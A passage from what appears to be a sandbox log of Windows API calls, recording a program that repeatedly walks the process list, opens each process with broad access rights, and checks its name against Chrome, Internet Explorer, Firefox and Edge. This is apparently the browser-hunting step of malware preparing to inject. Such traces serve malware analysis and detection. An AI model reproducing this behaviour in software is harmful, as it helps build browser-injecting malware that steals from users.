	[0220.044] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4cc4
	[0220.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.044] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.045] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.045] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.045] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.046] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0220.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4cc8
	[0220.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.046] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.047] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.047] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.047] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.048] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4ccc
	[0220.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.048] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.049] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.049] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.049] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.050] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0220.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x4cd0
	[0220.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.050] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0220.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.051] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.051] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0220.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.051] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.052] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0220.052] CloseHandle (hObject=0x188) returned 1
	[0220.052] Sleep (dwMilliseconds=0x64) 
	[0220.149] GetCurrentProcessId () returned 0x110
	[0220.149] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0220.153] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0220.154] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0220.155] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0220.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4cd4
	[0220.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.156] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.157] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.157] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.157] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.157] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0220.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4cd8
	[0220.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.158] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.158] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.159] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.159] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.159] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0220.160] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4cdc
	[0220.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.160] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0220.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.160] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.161] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0220.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.161] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.161] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0220.162] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4ce0
	[0220.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.163] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.163] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.228] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.228] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.229] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0220.229] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4ce4
	[0220.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.230] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0220.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.230] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.230] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0220.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.231] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.231] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0220.231] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4ce8
	[0220.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.232] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0220.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.232] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.232] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0220.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.233] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.233] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0220.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4cec
	[0220.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.234] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0220.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.234] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.234] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0220.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.234] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.235] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0220.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4cf0
	[0220.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.235] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0220.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.236] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.236] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0220.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.236] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.236] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4cf4
	[0220.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.237] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.237] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.238] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.238] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.238] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.239] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4cf8
	[0220.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.239] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.239] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.240] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.240] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.240] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4cfc
	[0220.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.241] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.242] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.242] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.242] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.242] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.243] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4d00
	[0220.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.243] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.244] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.244] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.244] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.244] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4d04
	[0220.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.245] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.246] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.246] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.246] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.247] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.247] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4d08
	[0220.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.247] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.248] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.248] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.248] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.249] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.249] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4d0c
	[0220.249] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.249] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.250] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.250] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.250] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.250] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0220.251] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4d10
	[0220.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.251] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0220.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0220.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.252] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.252] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.253] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4d14
	[0220.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.253] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.254] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.254] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.254] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.254] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0220.255] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4d18
	[0220.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.255] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.255] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.256] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.256] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.256] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0220.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x4d1c
	[0220.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.258] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0220.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.258] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.259] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0220.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.259] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.259] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x4d20
	[0220.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.260] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.260] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.261] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
